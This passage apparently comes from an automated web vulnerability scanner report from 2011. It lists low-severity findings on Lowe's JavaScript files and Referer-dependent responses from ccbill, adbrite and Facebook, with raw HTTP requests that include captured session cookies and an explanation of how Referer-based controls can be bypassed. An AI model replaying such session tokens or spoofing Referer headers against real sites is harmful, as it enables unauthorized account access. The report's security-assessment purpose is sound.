LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmRS=&t1=1310506254730&t2=1310506258515&t3=1310506283316&lti=1310506282770&ln=Flooring-Home-A2R2-Merch-Flooring_Event_Page_Shop&hr=/pc_Flooring_4294934373_4294937087_%3Fcm_sp%3DFlooring-_-Home%7CA2R2-_-Merch%7CFlooring_Event_Page_Shop%26cm_cr%3DHomepage+1.2-_-Web+Activity-_-Homepage+A2+Activity+7.12.11-_-HomePage_Area2-_-132107_3_Flooring-Home-A2R2-Merch-Flooring_Event_Page_Shop&fti=&fn=storeSearchForm%3A0%3BstoreUpdateForm%3A1%3BsearchNearestStoresForm%3A2%3BfrmQuickSearch%3A3%3B&ac=&fd=&uer=&fu=&pi=HOME&ho=www7.lowes.com/eluminate%3F&ci=90226018; fsr.a=1310506283883

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 08 Dec 2010 19:23:18 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 1649
Expires: Tue, 12 Jul 2011 21:31:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:31:25 GMT
Connection: close
Vary: Accept-Encoding

/**
* Lowes Javascript Library.
*
* This is licensed only for use in providing the Lowes.com service,
* or any part thereof, and is subject to the Lowes.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.MemberGroup
* @Author Wcope
* @version <%=VERSION=%>
*/

(function(){
// Grab Lowes namespace object or create a new one.
var Lowes = window.Lowes || {};

/**
* Simplified Cookie based information for MemberGroups
*/
var MemberGr
...[SNIP]...

13.5. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowes.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowes.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/lowes.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpL0emnRAXCBEyb1P3TIgvN33O5bKg83oIP9HgETjY0njRr0u8xYTB20%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; JSESSIONID=0000PEQyadqdrfGWIRAteqY0oby:14e1grfqa; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=3; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"http://www.lowes.com/pc_Flooring_4294934373_4294937087_","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; stop_mobi=yes; TS176ebc=1a0f9fe32c557afd221d80acddaf468367f2f8b0aad7ead04e1cbb8c

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 07 Jul 2011 16:52:15 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 116111
Expires: Tue, 12 Jul 2011 21:31:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:31:44 GMT
Connection: keep-alive
Vary: Accept-Encoding

/*
This is to ensure that a console object is always available as well as it...s many methods.
*/

if (!window.console || !console.firebug){
var methods = ["log", "debug", "info", "warn", "error"
...[SNIP]...
s subject to the Lowes.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.Cookie
* @Author WCope
* @version <%=VERSION=%>
*/

(function(){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   /**
    * Class for working with browser cookies. Simplifies setting, getting, deleting
   *
    * @
...[SNIP]...
is subject to the Lowes.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.Prefs
* @Author Wcope
* @version <%=VERSION=%>
*/

(function(){
// Grab Lowes namespace object or create a new one.
var Lowes = window.Lowes || {};

/**
   * Simplified Cookie based preferences for users
   */
var Prefs = {
    // Store
...[SNIP]...
is subject to the Lowes.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.Utils
* @Author WCope
* @version <%=VERSION=%>
*/

(function(){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   Lowes.PageTypes = {
       Other        : 0,
       List        : 1,
       Details        : 2,
       Category    : 3
   };

   var Util
...[SNIP]...
hout Lowes.com's written consent.
*/

/**
* Lowes.UI Namespace Object that will be the parent of all
* Lowes UI components library classes.
*
* @Package: Lowes.UI
* @Author WCope
* @version <%=VERSION=%>
*/

;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};

   // Sil
...[SNIP]...
Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.UI.Accordion
* @member Lowes.UI
* @Author WCope
* @version <%=VERSION=%>
*/

;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};

   // Qui
...[SNIP]...
m Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.UI.Carousel
* @member Lowes.UI
* @Author MHead
* @version <%=VERSION=%>
*/
;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};

   // Quic
...[SNIP]...
.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.UI.Modal
* @member Lowes.UI
* @Author WCope
* @version <%=VERSION=%>
*/

;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};

   // Qui
...[SNIP]...
s.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.UI.Tabs
* @member Lowes.UI
* @Author WCope
* @version <%=VERSION=%>
*/

;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};

   // Qui
...[SNIP]...
Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.UI.Slideshow
* @member Lowes.UI
* @Author MHead
* @version <%=VERSION=%>
*/

;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};

   // Qui
...[SNIP]...

13.6. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowesjs/memberGroup.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowesjs/memberGroup.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/lowesjs/memberGroup.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpL0emnRAXCBEyb1P3TIgvN33O5bKg83oIP9HgETjY0njRr0u8xYTB20%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; JSESSIONID=0000PEQyadqdrfGWIRAteqY0oby:14e1grfqa; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=3; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"http://www.lowes.com/pc_Flooring_4294934373_4294937087_","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; stop_mobi=yes; TS176ebc=1a0f9fe32c557afd221d80acddaf468367f2f8b0aad7ead04e1cbb8c

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 08 Dec 2010 19:23:18 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 1649
Expires: Tue, 12 Jul 2011 21:31:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:31:44 GMT
Connection: keep-alive
Vary: Accept-Encoding

/**
* Lowes Javascript Library.
*
* This is licensed only for use in providing the Lowes.com service,
* or any part thereof, and is subject to the Lowes.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.MemberGroup
* @Author Wcope
* @version <%=VERSION=%>
*/

(function(){
// Grab Lowes namespace object or create a new one.
var Lowes = window.Lowes || {};

/**
* Simplified Cookie based information for MemberGroups
*/
var MemberGr
...[SNIP]...

14. Referer-dependent response previous next
There are 5 instances of this issue:

https://admin.ccbill.com/style/css/images/text-bg.gif
http://bstats.adbrite.com/click/bstats.gif
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.youtube.com/embed/IHmPw1HsCe4

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

14.1. https://admin.ccbill.com/style/css/images/text-bg.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://admin.ccbill.com
Path:	/style/css/images/text-bg.gif

Request 1

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 12 Jul 2011 17:15:16 GMT
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/
Content-Length: 6288

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title></title>

<link rel="stylesheet" href="/style/css/default_style.css" type="text/css" />
<link rel="stylesheet" href="/sty
...[SNIP]...
<br>https%3A%2F%2Fadmin.ccbill.com%2FloginMM.cgi<br><br></TD>
<TD class="InnerLoginRight" align="center">

</TD>
</TR>
<TR>
                                       <TD valign=bottom><img src="/style/images/login-bottom-leftcorner.gif" border=0></TD>
<TD class="InnerLoginBottom" valign=bottom>

</TD>
                                       <TD valign=bottom><img src="/style/images/login-bottom-rightcorner.gif" border=0></TD>
                               </TR>
</TABLE>
</td>
</tr>
</table>

</div>
<!--POPUP
<script type="text/javascript" src="/js/bugreport.js"></script>
<script type="text/javascript">
function openHelpLink(url, helpId){
if (!helpId){
if (document.domain.match(/ecsuite/)){
window.open(url, "popWindow","scrollbars,resizable,toolbar");
return;
}
helpId = 1;
}
RH_ShowHelp(0,url,HH_HELP_CONTEXT,helpId);
}
</script>
<div style="position:absolute; top:0; height:70px; width:100%;" class='bgImg'>
<div id="topLeft" class="headerLogo">
</div>
<div id="topRight" class='popLinksArea'>
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td>
<a class="links" onClick="openBugReport();return false;" href="">Report a Bug</a>
</td>
<td> | </td>
<td>
<a class="links" onClick="openHelpLink(helpLink,helpId);return false;" href="">Help</a>
</td>
<td> | </td>
<td>
<a class="links" href="" onClick="window.close();return false;">Close window</a>
</td>
</tr>
</table>
</div>
</div>
<script type="text/javascript">
resizeMainTable();
try {
window.opener.p
...[SNIP]...

Request 2

GET /style/css/images/text-bg.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Jul 2011 17:16:02 GMT
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/
Content-Length: 6244

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title></title>

<link rel="stylesheet" href="/style/css/default_style.css" type="text/css" />
<link rel="stylesheet" href="/sty
...[SNIP]...
<br><br><br></TD>
<TD class="InnerLoginRight" align="center">

</TD>
</TR>
<TR>
                                       <TD valign=bottom><img src="/style/images/login-bottom-leftcorner.gif" border=0></TD>
<TD class="InnerLoginBottom" valign=bottom>

</TD>
                                       <TD valign=bottom><img src="/style/images/login-bottom-rightcorner.gif" border=0></TD>
                               </TR>
</TABLE>
</td>
</tr>
</table>

</div>
<!--POPUP
<script type="text/javascript" src="/js/bugreport.js"></script>
<script type="text/javascript">
function openHelpLink(url, helpId){
if (!helpId){
if (document.domain.match(/ecsuite/)){
window.open(url, "popWindow","scrollbars,resizable,toolbar");
return;
}
helpId = 1;
}
RH_ShowHelp(0,url,HH_HELP_CONTEXT,helpId);
}
</script>
<div style="position:absolute; top:0; height:70px; width:100%;" class='bgImg'>
<div id="topLeft" class="headerLogo">
</div>
<div id="topRight" class='popLinksArea'>
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td>
<a class="links" onClick="openBugReport();return false;" href="">Report a Bug</a>
</td>
<td> | </td>
<td>
<a class="links" onClick="openHelpLink(helpLink,helpId);return false;" href="">Help</a>
</td>
<td> | </td>
<td>
<a class="links" href="" onClick="window.close();return false;">Close window</a>
</td>
</tr>
</table>
</div>
</div>
<script type="text/javascript">
resizeMainTable();
try {
window.opener.parent.parent.extendSession();
}

...[SNIP]...

14.2. http://bstats.adbrite.com/click/bstats.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bstats.adbrite.com
Path:	/click/bstats.gif

Request 1

Response 1

Request 2

GET /click/bstats.gif?kid=47018554&bapid=9470 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; rb=0:684339:20838240:110:0:712156:20861280:1voofy6a0tk1w:0:712181:20838240:WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0:762701:20861280:E3F32BD05A8DDF4D5646D79640088B:0:806205:20882880:9ed3f2f2-7f5a-11e0-a07a-00259009a9e4:0; cv="1%3Aq1ZyLi0uyc91zUtWslLKMM%2B1rEnPKzHNt0wsqTG2MixKzSgxsDK0MtDJSMoyqkkvyKoqTy5IrjG0MizJqyjIsDK1MszPq1CqBQA%3D"; srh="1%3Aq64FAA%3D%3D"; rb2=Ci4KBjc2MjcwMRi9rereJiIeRTNGMzJCRDA1QThEREY0RDU2NDZENzk2NDAwODhCEAE; ut="1%3AVZJJsoMgFEX3wtgBoqJmN4oNoiiNhmjI3j%2BN9SuZnrrn3VsUb%2FBE4PEGc3%2BaTXUaPICu%2BNnZVDUiy2xqYSI02U8H1LjPARC64OnE%2FdOmO8xF8Q3z1SUXWjUB%2BltNuAVNAOpS0t3SsMTrl1bMrmo%2FZ0JvbcDcaYbXQwSDXIoAOhGBXI7cKWlrqggy%2BMI%2BsaK4Wh7M1K6JFLyNQJR8cwrRZR%2BVVNZB4b2K49aBuHFH0%2BPRIosuuPSJrLeXq1Btx7aYMgvfg3bEcVJ2l1urc5He46aD%2BqYca%2FavyDAujeMUIf6N9YvV7f0MtBolpMKnpqv4gdsvZCU1HPkCDO8CPaqTOFA%2BJxkLeCb9CyrKkc2tHhJdiC0c4muMaMxYqOMUeQAS0Dbr2qspfAPw%2BfwB"; vsd=0@1@4e1cb118@www.imiclk.com

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3AVZJJsoMgFEX3wtgBoKJmN4ooNiiNxmjI3kNj%2FfqZnrrn3VsUb%2FDE4PEGEzuPVbcGPIApxdlapGuZphZZmEhDt9MB3W9TAJTPZDgJe1q0wUzm%2F2G2uOTMyzpAf6sOt%2BARgL60crf2mpHTphbXBWxuNZ9c3XZOlN9qR4RTD1F1EXRqzgNoZQRq3jOnoOYoI0jhi%2FjEguNytY9HZZGhuWgikIVYnUJNwaKCVBUUwXQcuHT0HthbbPEFZ5aoan25Ct204xpTxyy2oO1xnFLt5daaTKJ73LBz35QRM%2F4pKoxDcZym1L%2BzeY1Vc78gL3sFufSp4cp%2F4PoLx4IfAvsCAu8C0%2BuTOlA8BxULRKr8C2ousM2s6RKTyzUcEkuMGDKOoU5w7AFIQFMvC9ND%2BArg8%2FkC"; path=/; domain=.adbrite.com; expires=Fri, 09-Jul-2021 20:40:10 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Tue, 12-Jul-2011 20:40:10 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Tue, 12 Jul 2011 20:40:10 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

14.3. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/like.php

Request 1

GET /plugins/like.php?app_id=211603812203681&href&send=true&layout=standard&width=450&show_faces=false&action=recommend&colorscheme=light&font=arial&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ri.gov/press/view/14202
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; locale=en_US; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.89.57
X-Cnection: close
Date: Wed, 13 Jul 2011 00:31:49 GMT
Content-Length: 6359

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="Content-Language" content="en" /><script>Cavalr
...[SNIP]...
<div id="connect_widget_4e1ce7759a3907908164875" class="connect_widget" style="font-family: "arial", sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You recommend this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem"> · <a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You recommend this</span><span class="connect_widget_not_connected_text"><a href="/campaign/landing.php?campaign_id=137675572948107&partner_id=ri.gov&placement=like_button&extra_1=http%3A%2F%2Fwww.ri.gov%2Fpress%2Fview%2F14202&extra_2=US" target="_blank">Sign Up</a> to see what your friends r
...[SNIP]...

Request 2

GET /plugins/like.php?app_id=211603812203681&href&send=true&layout=standard&width=450&show_faces=false&action=recommend&colorscheme=light&font=arial&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
